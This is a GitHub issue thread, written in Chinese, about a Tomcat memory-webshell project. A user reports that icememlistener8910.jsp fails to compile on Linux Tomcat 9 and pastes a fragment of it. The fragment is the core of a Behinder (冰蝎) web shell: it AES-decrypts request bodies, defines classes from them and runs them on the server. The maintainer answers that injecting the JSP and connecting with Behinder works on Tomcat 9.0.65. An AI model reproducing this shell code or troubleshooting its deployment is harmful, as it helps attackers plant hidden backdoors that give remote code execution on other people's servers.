### ISSUE TITLE
icememlistener8910.jsp linux tomcat9 报错

### ISSUE THREAD

**Issue by smxiazi** [ce-automne/TomcatMemShell#1]
org.apache.jasper.JasperException: 无法为JSP编译类: 

JSP文件：[/b5c90b1353ad6245dffb4a02acc14253a.jsp] 的第 [89] 行发生了一个错误
sun.misc.BASE64Decoder cannot be resolved to a type
86: 			session.setAttribute("u", k);
87: 			Cipher c = Cipher.getInstance("AES");
88: 			c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
89: 			byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
90: 			Class eclass = (Class) Um.invoke(u, eClassBytes);
91: 			Object a = eclass.newInstance();
92: 			Method b = eclass.getDeclaredMethod("equals", Object.class);

Stacktrace:
	org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:102)
	org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:213)
	org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:498)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:397)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:367)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:351)
	org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:605)
	org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:399)
	org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:379)
	org.apache.jasper.servlet.JspServlet.service(JspServlet.java:327)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:764)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)

**Comment by ce-automne** [comment]
你好，

我这边在Linux(CentOS 7.9)环境测试了apache-tomcat-9.0.65版本，注入icememlistener8910.jsp再用冰蝎连接一切正常欸

<img width="326" alt="image" src="https://user-images.githubusercontent.com/20917372/180375323-29d902b2-3b5b-411d-9371-9a947958364a.png">
